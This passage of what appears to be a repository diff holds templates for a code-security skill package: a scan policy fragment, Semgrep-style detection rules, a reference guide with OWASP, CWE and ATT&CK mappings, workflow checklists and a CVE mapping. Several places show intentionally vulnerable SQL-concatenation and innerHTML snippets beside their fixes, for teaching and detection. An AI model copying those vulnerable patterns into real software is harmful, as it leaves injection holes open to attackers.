"tests/**",
"**/test/**",
"**/__tests__/**",
"**/*.test.js",
"**/*.spec.js",
"node_modules/**/.bin/**"
],
"dev_dependencies": {
"exclude_from_production_scan": true,
"apply_relaxed_policy": true
}
},
"notification_settings": {
"description": "Alert and notification configuration",
"notify_on_new_vulnerabilities": true,
"notify_on_policy_violation": true,
"notify_on_license_violation": true,
"notification_channels": [
"email",
"slack",
"jira"
]
},
"remediation_guidance": {
"description": "Remediation policy and guidance",
"auto_create_tickets": true,
"ticket_system": "jira",
"assign_to_component_owner": true,
"require_risk_acceptance_approval": true,
"max_risk_acceptance_duration_days": 90
}
}

View File

@@ -0,0 +1,355 @@
# Security Rule Template
#
# This template demonstrates how to structure security rules/policies.
# Adapt this template to your specific security tool (Semgrep, OPA, etc.)
#
# Rule Structure Best Practices:
# - Clear rule ID and metadata
# - Severity classification
# - Framework mappings (OWASP, CWE)
# - Remediation guidance
# - Example vulnerable and fixed code
rules:
# Example Rule 1: SQL Injection Detection
- id: sql-injection-string-concatenation
metadata:
name: "SQL Injection via String Concatenation"
description: "Detects potential SQL injection vulnerabilities from string concatenation in SQL queries"
severity: "HIGH"
category: "security"
subcategory: "injection"
# Security Framework Mappings
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-89: SQL Injection"
mitre_attack:
- "T1190: Exploit Public-Facing Application"
# Compliance Standards
compliance:
- "PCI-DSS 6.5.1: Injection flaws"
- "NIST 800-53 SI-10: Information Input Validation"
# Confidence and Impact
confidence: "HIGH"
likelihood: "HIGH"
impact: "HIGH"
# References
references:
- "https://owasp.org/www-community/attacks/SQL_Injection"
- "https://cwe.mitre.org/data/definitions/89.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
# Languages this rule applies to
languages:
- python
- javascript
- java
- go
# Detection Pattern (example using Semgrep-style syntax)
pattern-either:
- pattern: |
cursor.execute($SQL + $VAR)
- pattern: |
cursor.execute(f"... {$VAR} ...")
- pattern: |
cursor.execute("..." + $VAR + "...")
# What to report when found
message: |
Potential SQL injection vulnerability detected. SQL query is constructed using
string concatenation or f-strings with user input. This allows attackers to
inject malicious SQL code.
Use parameterized queries instead:
- Python: cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
- JavaScript: db.query("SELECT * FROM users WHERE id = $1", [userId])
See: https://owasp.org/www-community/attacks/SQL_Injection
# Suggested fix (auto-fix if supported)
fix: |
Use parameterized queries with placeholders
# Example vulnerable code
examples:
- vulnerable: |
# Vulnerable: String concatenation
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
- fixed: |
# Fixed: Parameterized query
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Example Rule 2: Hardcoded Secrets Detection
- id: hardcoded-secret-credential
metadata:
name: "Hardcoded Secret or Credential"
description: "Detects hardcoded secrets, API keys, passwords, or tokens in source code"
severity: "CRITICAL"
category: "security"
subcategory: "secrets"
owasp:
- "A07:2021 - Identification and Authentication Failures"
cwe:
- "CWE-798: Use of Hard-coded Credentials"
- "CWE-259: Use of Hard-coded Password"
compliance:
- "PCI-DSS 8.2.1: Use of strong cryptography"
- "SOC 2 CC6.1: Logical access controls"
- "GDPR Article 32: Security of processing"
confidence: "MEDIUM"
likelihood: "HIGH"
impact: "CRITICAL"
references:
- "https://cwe.mitre.org/data/definitions/798.html"
- "https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password"
languages:
- python
- javascript
- java
- go
- ruby
pattern-either:
- pattern: |
password = "..."
- pattern: |
api_key = "..."
- pattern: |
secret = "..."
- pattern: |
token = "..."
pattern-not: |
$VAR = ""
message: |
Potential hardcoded secret detected. Hardcoding credentials in source code
is a critical security vulnerability that can lead to unauthorized access
if the code is exposed.
Use environment variables or a secrets management system instead:
- Python: os.environ.get('API_KEY')
- Node.js: process.env.API_KEY
- Secrets Manager: AWS Secrets Manager, HashiCorp Vault, etc.
See: https://cwe.mitre.org/data/definitions/798.html
examples:
- vulnerable: |
# Vulnerable: Hardcoded API key
api_key = "sk-1234567890abcdef"
api.authenticate(api_key)
- fixed: |
# Fixed: Environment variable
import os
api_key = os.environ.get('API_KEY')
if not api_key:
raise ValueError("API_KEY environment variable not set")
api.authenticate(api_key)
# Example Rule 3: XSS via Unsafe HTML Rendering
- id: xss-unsafe-html-rendering
metadata:
name: "Cross-Site Scripting (XSS) via Unsafe HTML"
description: "Detects unsafe HTML rendering that could lead to XSS vulnerabilities"
severity: "HIGH"
category: "security"
subcategory: "xss"
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-79: Cross-site Scripting (XSS)"
- "CWE-80: Improper Neutralization of Script-Related HTML Tags"
compliance:
- "PCI-DSS 6.5.7: Cross-site scripting"
- "NIST 800-53 SI-10: Information Input Validation"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://owasp.org/www-community/attacks/xss/"
- "https://cwe.mitre.org/data/definitions/79.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
languages:
- javascript
- typescript
- jsx
- tsx
pattern-either:
- pattern: |
dangerouslySetInnerHTML={{__html: $VAR}}
- pattern: |
innerHTML = $VAR
message: |
Potential XSS vulnerability detected. Setting HTML content directly from
user input without sanitization can allow attackers to inject malicious
JavaScript code.
Use one of these safe alternatives:
- React: Use {userInput} for automatic escaping
- DOMPurify: const clean = DOMPurify.sanitize(dirty);
- Framework-specific sanitizers
See: https://owasp.org/www-community/attacks/xss/
examples:
- vulnerable: |
// Vulnerable: Unsanitized HTML
function UserComment({ comment }) {
return <div dangerouslySetInnerHTML={{__html: comment}} />;
}
- fixed: |
// Fixed: Sanitized with DOMPurify
import DOMPurify from 'dompurify';
function UserComment({ comment }) {
const sanitized = DOMPurify.sanitize(comment);
return <div dangerouslySetInnerHTML={{__html: sanitized}} />;
}
# Example Rule 4: Insecure Cryptography
- id: weak-cryptographic-algorithm
metadata:
name: "Weak Cryptographic Algorithm"
description: "Detects use of weak or deprecated cryptographic algorithms"
severity: "HIGH"
category: "security"
subcategory: "cryptography"
owasp:
- "A02:2021 - Cryptographic Failures"
cwe:
- "CWE-327: Use of a Broken or Risky Cryptographic Algorithm"
- "CWE-326: Inadequate Encryption Strength"
compliance:
- "PCI-DSS 4.1: Use strong cryptography"
- "NIST 800-53 SC-13: Cryptographic Protection"
- "GDPR Article 32: Security of processing"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://cwe.mitre.org/data/definitions/327.html"
- "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/"
languages:
- python
- javascript
- java
pattern-either:
- pattern: |
hashlib.md5(...)
- pattern: |
hashlib.sha1(...)
- pattern: |
crypto.createHash('md5')
- pattern: |
crypto.createHash('sha1')
message: |
Weak cryptographic algorithm detected (MD5 or SHA1). These algorithms are
considered cryptographically broken and should not be used for security purposes.
Use strong alternatives:
- For hashing: SHA-256, SHA-384, or SHA-512
- For password hashing: bcrypt, argon2, or PBKDF2
- Python: hashlib.sha256()
- Node.js: crypto.createHash('sha256')
See: https://cwe.mitre.org/data/definitions/327.html
examples:
- vulnerable: |
# Vulnerable: MD5 hash
import hashlib
hash_value = hashlib.md5(data).hexdigest()
- fixed: |
# Fixed: SHA-256 hash
import hashlib
hash_value = hashlib.sha256(data).hexdigest()
# Rule Configuration
configuration:
# Global settings
enabled: true
severity_threshold: "MEDIUM" # Report findings at MEDIUM severity and above
# Performance tuning
max_file_size_kb: 1024
exclude_patterns:
- "test/*"
- "tests/*"
- "node_modules/*"
- "vendor/*"
- "*.min.js"
# False positive reduction
confidence_threshold: "MEDIUM" # Only report findings with MEDIUM confidence or higher
# Rule Metadata Schema
# This section documents the expected structure for rules
metadata_schema:
required:
- id: "Unique identifier for the rule (kebab-case)"
- name: "Human-readable rule name"
- description: "What the rule detects"
- severity: "CRITICAL | HIGH | MEDIUM | LOW | INFO"
- category: "security | best-practice | performance"
optional:
- subcategory: "Specific type (injection, xss, secrets, etc.)"
- owasp: "OWASP Top 10 mappings"
- cwe: "CWE identifier(s)"
- mitre_attack: "MITRE ATT&CK technique(s)"
- compliance: "Compliance standard references"
- confidence: "Detection confidence level"
- likelihood: "Likelihood of exploitation"
- impact: "Potential impact if exploited"
- references: "External documentation links"
# Usage Instructions:
#
# 1. Copy this template when creating new security rules
# 2. Update metadata fields with appropriate framework mappings
# 3. Customize detection patterns for your tool (Semgrep, OPA, etc.)
# 4. Provide clear remediation guidance in the message field
# 5. Include both vulnerable and fixed code examples
# 6. Test rules on real codebases before deployment
#
# Best Practices:
# - Map to multiple frameworks (OWASP, CWE, MITRE ATT&CK)
# - Include compliance standard references
# - Provide actionable remediation guidance
# - Show code examples (vulnerable vs. fixed)
# - Tune confidence levels to reduce false positives
# - Exclude test directories to reduce noise

View File

@@ -0,0 +1,550 @@
# Reference Document Template
This file demonstrates how to structure detailed reference material that Claude loads on-demand.
**When to use this reference**: Include a clear statement about when Claude should consult this document.
For example: "Consult this reference when analyzing Python code for security vulnerabilities and needing detailed remediation patterns."
**Document purpose**: Briefly explain what this reference provides that's not in SKILL.md.
---
## Table of Contents
**For documents >100 lines, always include a table of contents** to help Claude navigate quickly.
- [When to Use References](#when-to-use-references)
- [Document Organization](#document-organization)
- [Detailed Technical Content](#detailed-technical-content)
- [Security Framework Mappings](#security-framework-mappings)
- [OWASP Top 10](#owasp-top-10)
- [CWE Mappings](#cwe-mappings)
- [MITRE ATT&CK](#mitre-attck)
- [Remediation Patterns](#remediation-patterns)
- [Advanced Configuration](#advanced-configuration)
- [Examples and Code Samples](#examples-and-code-samples)
---
## When to Use References
**Move content from SKILL.md to references/** when:
1. **Content exceeds 100 lines** - Keep SKILL.md concise
2. **Framework-specific details** - Detailed OWASP/CWE/MITRE mappings
3. **Advanced user content** - Deep technical details for expert users
4. **Lookup-oriented content** - Rule libraries, configuration matrices, comprehensive lists
5. **Language-specific patterns** - Separate files per language/framework
6. **Historical context** - Old patterns and deprecated approaches
**Keep in SKILL.md**:
- Core workflows (top 3-5 use cases)
- Decision points and branching logic
- Quick start guidance
- Essential security considerations
---
## Document Organization
### Structure for Long Documents
For references >100 lines:
```markdown
# Title
**When to use**: Clear trigger statement
**Purpose**: What this provides
## Table of Contents
- Links to all major sections
## Quick Reference
- Key facts or commands for fast lookup
## Detailed Content
- Comprehensive information organized logically
## Framework Mappings
- OWASP, CWE, MITRE ATT&CK references
## Examples
- Code samples and patterns
```
### Section Naming Conventions
- Use **imperative** or **declarative** headings
- ✅ "Detecting SQL Injection" not "How to detect SQL Injection"
- ✅ "Common Patterns" not "These are common patterns"
- Make headings **searchable** and **specific**
---
## Detailed Technical Content
This section demonstrates the type of detailed content that belongs in references rather than SKILL.md.
### Example: Comprehensive Vulnerability Detection
#### SQL Injection Detection Patterns
**Pattern 1: String Concatenation in Queries**
```python
# Vulnerable pattern
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
# Detection criteria:
# - SQL keyword (SELECT, INSERT, UPDATE, DELETE)
# - String concatenation operator (+, f-string)
# - Variable user input (request params, form data)
# Severity: HIGH
# CWE: CWE-89
# OWASP: A03:2021 - Injection
```
**Remediation**:
```python
# Fixed: Parameterized query
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# OR using ORM
user = User.objects.get(id=user_id)
```
**Pattern 2: Unsafe String Formatting**
```python
# Vulnerable patterns
query = f"SELECT * FROM users WHERE name = '{username}'"
query = "SELECT * FROM users WHERE name = '%s'" % username
query = "SELECT * FROM users WHERE name = '{}'".format(username)
# All three patterns are vulnerable to SQL injection
```
#### Cross-Site Scripting (XSS) Detection
**Pattern 1: Unescaped Output in Templates**
```javascript
// Vulnerable: Direct HTML injection
element.innerHTML = userInput;
document.write(userInput);
// Vulnerable: React dangerouslySetInnerHTML
<div dangerouslySetInnerHTML={{__html: userComment}} />
// Detection criteria:
# - Direct DOM manipulation (innerHTML, document.write)
# - React dangerouslySetInnerHTML with user data
# - Template engines with autoescaping disabled
// Severity: HIGH
// CWE: CWE-79
// OWASP: A03:2021 - Injection
```
**Remediation**:
```javascript
// Fixed: Escaped output
element.textContent = userInput; // Auto-escapes
// Fixed: Sanitization library
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userComment);
<div dangerouslySetInnerHTML={{__html: clean}} />
```
---
## Security Framework Mappings
This section provides comprehensive security framework mappings for findings.
### OWASP Top 10
Map security findings to OWASP Top 10 (2021) categories:
| Category | Title | Common Vulnerabilities |
|----------|-------|----------------------|
| **A01:2021** | Broken Access Control | Authorization bypass, privilege escalation, IDOR |
| **A02:2021** | Cryptographic Failures | Weak crypto, plaintext storage, insecure TLS |
| **A03:2021** | Injection | SQL injection, XSS, command injection, LDAP injection |
| **A04:2021** | Insecure Design | Missing security controls, threat modeling gaps |
| **A05:2021** | Security Misconfiguration | Default configs, verbose errors, unnecessary features |
| **A06:2021** | Vulnerable Components | Outdated libraries, unpatched dependencies |
| **A07:2021** | Auth & Session Failures | Weak passwords, session fixation, missing MFA |
| **A08:2021** | Software & Data Integrity | Unsigned updates, insecure CI/CD, deserialization |
| **A09:2021** | Logging & Monitoring Failures | Insufficient logging, no alerting, log injection |
| **A10:2021** | SSRF | Server-side request forgery, unvalidated redirects |
**Usage**: When reporting findings, map to primary OWASP category and reference the identifier (e.g., "A03:2021 - Injection").
### CWE Mappings
Map to relevant Common Weakness Enumeration categories for precise vulnerability classification:
#### Injection Vulnerabilities
- **CWE-78**: OS Command Injection
- **CWE-79**: Cross-site Scripting (XSS)
- **CWE-89**: SQL Injection
- **CWE-90**: LDAP Injection
- **CWE-91**: XML Injection
- **CWE-94**: Code Injection
#### Authentication & Authorization
- **CWE-287**: Improper Authentication
- **CWE-288**: Authentication Bypass Using Alternate Path
- **CWE-290**: Authentication Bypass by Spoofing
- **CWE-294**: Authentication Bypass by Capture-replay
- **CWE-306**: Missing Authentication for Critical Function
- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
- **CWE-352**: Cross-Site Request Forgery (CSRF)
#### Cryptographic Issues
- **CWE-256**: Plaintext Storage of Password
- **CWE-259**: Use of Hard-coded Password
- **CWE-261**: Weak Encoding for Password
- **CWE-321**: Use of Hard-coded Cryptographic Key
- **CWE-326**: Inadequate Encryption Strength
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
- **CWE-329**: Not Using a Random IV with CBC Mode
- **CWE-798**: Use of Hard-coded Credentials
#### Input Validation
- **CWE-20**: Improper Input Validation
- **CWE-73**: External Control of File Name or Path
- **CWE-434**: Unrestricted Upload of File with Dangerous Type
- **CWE-601**: URL Redirection to Untrusted Site
#### Sensitive Data Exposure
- **CWE-200**: Information Exposure
- **CWE-209**: Information Exposure Through Error Message
- **CWE-312**: Cleartext Storage of Sensitive Information
- **CWE-319**: Cleartext Transmission of Sensitive Information
- **CWE-532**: Information Exposure Through Log Files
**Usage**: Include CWE identifier in all vulnerability reports for standardized classification.
### MITRE ATT&CK
Reference relevant tactics and techniques for threat context:
#### Initial Access (TA0001)
- **T1190**: Exploit Public-Facing Application
- **T1133**: External Remote Services
- **T1078**: Valid Accounts
#### Execution (TA0002)
- **T1059**: Command and Scripting Interpreter
- **T1203**: Exploitation for Client Execution
#### Persistence (TA0003)
- **T1098**: Account Manipulation
- **T1136**: Create Account
- **T1505**: Server Software Component
#### Privilege Escalation (TA0004)
- **T1068**: Exploitation for Privilege Escalation
- **T1548**: Abuse Elevation Control Mechanism
#### Defense Evasion (TA0005)
- **T1027**: Obfuscated Files or Information
- **T1140**: Deobfuscate/Decode Files or Information
- **T1562**: Impair Defenses
#### Credential Access (TA0006)
- **T1110**: Brute Force
- **T1555**: Credentials from Password Stores
- **T1552**: Unsecured Credentials
#### Discovery (TA0007)
- **T1083**: File and Directory Discovery
- **T1046**: Network Service Scanning
#### Collection (TA0009)
- **T1005**: Data from Local System
- **T1114**: Email Collection
#### Exfiltration (TA0010)
- **T1041**: Exfiltration Over C2 Channel
- **T1567**: Exfiltration Over Web Service
**Usage**: When identifying vulnerabilities, consider which ATT&CK techniques an attacker could use to exploit them.
---
## Remediation Patterns
This section provides specific remediation guidance for common vulnerability types.
### SQL Injection Remediation
**Step 1: Identify vulnerable queries**
- Search for string concatenation in SQL queries
- Check for f-strings or format() with SQL keywords
- Review all database interaction code
**Step 2: Apply parameterized queries**
```python
# Python with sqlite3
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Python with psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# Python with SQLAlchemy (ORM)
from sqlalchemy import text
result = session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
```
**Step 3: Validate and sanitize input** (defense in depth)
```python
import re
# Validate input format
if not re.match(r'^\d+$', user_id):
raise ValueError("Invalid user ID format")
# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```
**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries
### XSS Remediation
**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled
**Step 2: Use framework-specific safe methods**
```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>
// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>
// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```
**Step 3: Sanitize when HTML is required**
```javascript
import DOMPurify from 'dompurify';
// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
ALLOWED_ATTR: []
});
```
**Step 4: Content Security Policy (CSP)**
```html
<!-- Add CSP header -->
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
```
---
## Advanced Configuration
This section contains detailed configuration options and tuning parameters.
### Example: SAST Tool Configuration
```yaml
# Advanced security scanner configuration
scanner:
# Severity threshold
severity_threshold: MEDIUM
# Rule configuration
rules:
enabled:
- sql-injection
- xss
- hardcoded-secrets
disabled:
- informational-only
# False positive reduction
confidence_threshold: HIGH
exclude_patterns:
- "*/test/*"
- "*/tests/*"
- "*/node_modules/*"
- "*.test.js"
- "*.spec.ts"
# Performance tuning
max_file_size_kb: 2048
timeout_seconds: 300
parallel_jobs: 4
# Output configuration
output_format: json
include_code_snippets: true
max_snippet_lines: 10
```
---
## Examples and Code Samples
This section provides comprehensive code examples for various scenarios.
### Example 1: Secure API Authentication
```python
# Secure API key handling
import os
from functools import wraps
from flask import Flask, request, jsonify
app = Flask(__name__)
# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
raise ValueError("API_KEY environment variable not set")
def require_api_key(f):
@wraps(f)
def decorated_function(*args, **kwargs):
api_key = request.headers.get('X-API-Key')
if not api_key:
return jsonify({'error': 'API key required'}), 401
# Constant-time comparison to prevent timing attacks
import hmac
if not hmac.compare_digest(api_key, VALID_API_KEY):
return jsonify({'error': 'Invalid API key'}), 403
return f(*args, **kwargs)
return decorated_function
@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
return jsonify({'message': 'Access granted'})
```
### Example 2: Secure Password Hashing
```python
# Secure password storage with bcrypt
import bcrypt
def hash_password(password: str) -> str:
"""Hash a password using bcrypt."""
# Generate salt and hash password
salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)
hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
return hashed.decode('utf-8')
def verify_password(password: str, hashed: str) -> bool:
"""Verify a password against a hash."""
return bcrypt.checkpw(
password.encode('utf-8'),
hashed.encode('utf-8')
)
# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash) # True
```
### Example 3: Secure File Upload
```python
# Secure file upload with validation
import os
import magic
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
'application/pdf',
'image/png',
'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
def is_allowed_file(filename: str, file_content: bytes) -> bool:
"""Validate file extension and MIME type."""
# Check extension
if '.' not in filename:
return False
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
return False
# Check MIME type (prevent extension spoofing)
mime = magic.from_buffer(file_content, mime=True)
if mime not in ALLOWED_MIME_TYPES:
return False
return True
def handle_upload(file):
"""Securely handle file upload."""
# Check file size
file.seek(0, os.SEEK_END)
size = file.tell()
file.seek(0)
if size > MAX_FILE_SIZE:
raise ValueError("File too large")
# Read content for validation
content = file.read()
file.seek(0)
# Validate file type
if not is_allowed_file(file.filename, content):
raise ValueError("Invalid file type")
# Sanitize filename
filename = secure_filename(file.filename)
# Generate unique filename to prevent overwrite attacks
import uuid
unique_filename = f"{uuid.uuid4()}_{filename}"
# Save to secure location (outside web root)
upload_path = os.path.join('/secure/uploads', unique_filename)
file.save(upload_path)
return unique_filename
```
---
## Best Practices for Reference Documents
1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8. **Be concise** - Even in references, challenge every sentence

View File

@@ -0,0 +1,253 @@
# Workflow Checklist Template
This template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.
## Pattern 1: Sequential Workflow Checklist
Use this pattern for operations that must be completed in order, step-by-step.
### Security Assessment Workflow
Progress:
[ ] 1. Identify application entry points and attack surface
[ ] 2. Map authentication and authorization flows
[ ] 3. Identify data flows and sensitive data handling
[ ] 4. Review existing security controls
[ ] 5. Document findings with framework references (OWASP, CWE)
[ ] 6. Prioritize findings by severity (CVSS scores)
[ ] 7. Generate report with remediation recommendations
Work through each step systematically. Check off completed items.
---
## Pattern 2: Conditional Workflow
Use this pattern when the workflow branches based on findings or conditions.
### Vulnerability Remediation Workflow
1. Identify vulnerability type
- If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)
- If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)
- If Authentication flaw → See [auth-remediation.md](auth-remediation.md)
- If Authorization flaw → See [authz-remediation.md](authz-remediation.md)
- If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)
2. Assess severity using CVSS calculator
- If CVSS >= 9.0 → Priority: Critical (immediate action)
- If CVSS 7.0-8.9 → Priority: High (action within 24h)
- If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)
- If CVSS < 4.0 → Priority: Low (action within 30 days)
3. Apply appropriate remediation pattern
4. Validate fix with security testing
5. Document changes and update security documentation
---
## Pattern 3: Iterative Workflow
Use this pattern for operations that repeat across multiple targets or items.
### Code Security Review Workflow
For each file in the review scope:
1. Identify security-sensitive operations (auth, data access, crypto, input handling)
2. Check against secure coding patterns for the language
3. Flag potential vulnerabilities with severity rating
4. Map findings to CWE and OWASP categories
5. Suggest specific remediation approaches
6. Document finding with code location and fix priority
Continue until all files in scope have been reviewed.
---
## Pattern 4: Feedback Loop Workflow
Use this pattern when validation and iteration are required.
### Secure Configuration Generation Workflow
1. Generate initial security configuration based on requirements
2. Run validation script: `./scripts/validate_config.py config.yaml`
3. Review validation output:
- Note all errors (must fix)
- Note all warnings (should fix)
- Note all info items (consider)
4. Fix identified issues in configuration
5. Repeat steps 2-4 until validation passes with zero errors
6. Review warnings and determine if they should be addressed
7. Apply configuration once validation is clean
**Validation Loop**: Run validator → Fix errors → Repeat until clean
---
## Pattern 5: Parallel Analysis Workflow
Use this pattern when multiple independent analyses can run concurrently.
### Comprehensive Security Scan Workflow
Run these scans in parallel:
**Static Analysis**:
[ ] 1a. Run SAST scan (Semgrep/Bandit)
[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)
[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)
[ ] 1d. Run license compliance check
**Dynamic Analysis**:
[ ] 2a. Run DAST scan (ZAP/Burp)
[ ] 2b. Run API security testing
[ ] 2c. Run authentication/authorization testing
**Infrastructure Analysis**:
[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)
[ ] 3b. Run container image scan (Trivy/Grype)
[ ] 3c. Run configuration review
**Consolidation**:
[ ] 4. Aggregate all findings
[ ] 5. Deduplicate and correlate findings
[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)
[ ] 7. Generate unified security report
---
## Pattern 6: Research and Documentation Workflow
Use this pattern for security research and documentation tasks.
### Threat Modeling Workflow
Research Progress:
[ ] 1. Identify system components and boundaries
[ ] 2. Map data flows between components
[ ] 3. Identify trust boundaries
[ ] 4. Enumerate assets (data, services, credentials)
[ ] 5. Apply STRIDE framework to each component:
- Spoofing threats
- Tampering threats
- Repudiation threats
- Information disclosure threats
- Denial of service threats
- Elevation of privilege threats
[ ] 6. Map threats to MITRE ATT&CK techniques
[ ] 7. Identify existing mitigations
[ ] 8. Document residual risks
[ ] 9. Recommend additional security controls
[ ] 10. Generate threat model document
Work through each step systematically. Check off completed items.
---
## Pattern 7: Compliance Validation Workflow
Use this pattern for compliance checks against security standards.
### Security Compliance Audit Workflow
**SOC 2 Controls Review**:
[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)
[ ] 2. Verify logical access controls implementation (CC6.1)
[ ] 3. Review authentication mechanisms (CC6.1)
[ ] 4. Verify encryption implementation (CC6.1, CC6.7)
[ ] 5. Review audit logging configuration (CC7.2)
[ ] 6. Verify security monitoring (CC7.2, CC7.3)
[ ] 7. Review incident response procedures (CC7.3, CC7.4)
[ ] 8. Verify backup and recovery processes (A1.2, A1.3)
**Evidence Collection**:
[ ] 9. Collect policy documents
[ ] 10. Collect configuration screenshots
[ ] 11. Collect audit logs
[ ] 12. Document control gaps
[ ] 13. Generate compliance report
---
## Pattern 8: Incident Response Workflow
Use this pattern for security incident handling.
### Security Incident Response Workflow
**Detection and Analysis**:
[ ] 1. Confirm security incident (rule out false positive)
[ ] 2. Determine incident severity (SEV1/2/3/4)
[ ] 3. Identify affected systems and data
[ ] 4. Preserve evidence (logs, memory dumps, network captures)
**Containment**:
[ ] 5. Isolate affected systems (network segmentation)
[ ] 6. Disable compromised accounts
[ ] 7. Block malicious indicators (IPs, domains, hashes)
[ ] 8. Implement temporary compensating controls
**Eradication**:
[ ] 9. Identify root cause
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
[ ] 11. Patch vulnerabilities exploited
[ ] 12. Reset compromised credentials
**Recovery**:
[ ] 13. Restore systems from clean backups (if needed)
[ ] 14. Re-enable systems with monitoring
[ ] 15. Verify system integrity
[ ] 16. Resume normal operations
**Post-Incident**:
[ ] 17. Document incident timeline
[ ] 18. Identify lessons learned
[ ] 19. Update security controls to prevent recurrence
[ ] 20. Update incident response procedures
[ ] 21. Communicate with stakeholders
---
## Usage Guidelines
### When to Use Workflow Checklists
**Use checklists for**:
- Complex multi-step operations
- Operations requiring specific order
- Security assessments and audits
- Incident response procedures
- Compliance validation tasks
**Don't use checklists for**:
- Simple single-step operations
- Highly dynamic exploratory work
- Operations that vary significantly each time
### Adapting This Template
1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file
2. **Customize steps** to match your specific security tool or process
3. **Add framework references** (OWASP, CWE, NIST) where applicable
4. **Include tool-specific commands** for automation
5. **Add decision points** where manual judgment is required
### Checklist Best Practices
- **Be specific**: "Run semgrep --config=auto ." not "Scan the code"
- **Include success criteria**: "Validation passes with 0 errors"
- **Reference standards**: Link to OWASP, CWE, NIST where relevant
- **Show progress**: Checkbox format helps track completion
- **Provide escape hatches**: "If validation fails, see troubleshooting.md"
### Integration with Feedback Loops
Combine checklists with validation scripts for maximum effectiveness:
1. Create checklist for the workflow
2. Provide validation script that checks quality
3. Include "run validator" step in checklist
4. Loop: Complete step → Validate → Fix issues → Re-validate
This pattern dramatically improves output quality through systematic validation.

View File

@@ -0,0 +1,348 @@
# CVE to CWE and OWASP Top 10 Mapping
## Table of Contents
- [Common Vulnerability Patterns](#common-vulnerability-patterns)
- [OWASP Top 10 2021 Mapping](#owasp-top-10-2021-mapping)
- [CWE Top 25 Mapping](#cwe-top-25-mapping)
- [Dependency Vulnerability Categories](#dependency-vulnerability-categories)
## Common Vulnerability Patterns
### Injection Vulnerabilities in Dependencies
**OWASP**: A03:2021 - Injection
**CWE**: CWE-89 (SQL Injection), CWE-78 (OS Command Injection)
Common in:
- ORM libraries with unsafe query construction
- Template engines with code execution features
- Database drivers with insufficient input sanitization
**Example CVEs**:
- CVE-2021-44228 (Log4Shell) - Remote Code Execution via JNDI injection
- CVE-2022-22965 (Spring4Shell) - RCE via Spring Framework
### Deserialization Vulnerabilities
**OWASP**: A08:2021 - Software and Data Integrity Failures
**CWE**: CWE-502 (Deserialization of Untrusted Data)
Common in:
- Java serialization libraries (Jackson, XStream, etc.)
- Python pickle
- PHP unserialize
**Example CVEs**:
- CVE-2017-5638 (Apache Struts) - Remote Code Execution
- CVE-2019-12384 (Jackson) - Polymorphic typing RCE
### Authentication and Cryptography Flaws
**OWASP**: A02:2021 - Cryptographic Failures
**CWE**: CWE-327 (Broken Crypto), CWE-311 (Missing Encryption)
Common in:
- Outdated cryptographic libraries
- JWT libraries with algorithm confusion
- SSL/TLS implementations with weak ciphers
**Example CVEs**:
- CVE-2022-21449 (Java ECDSA) - Signature validation bypass
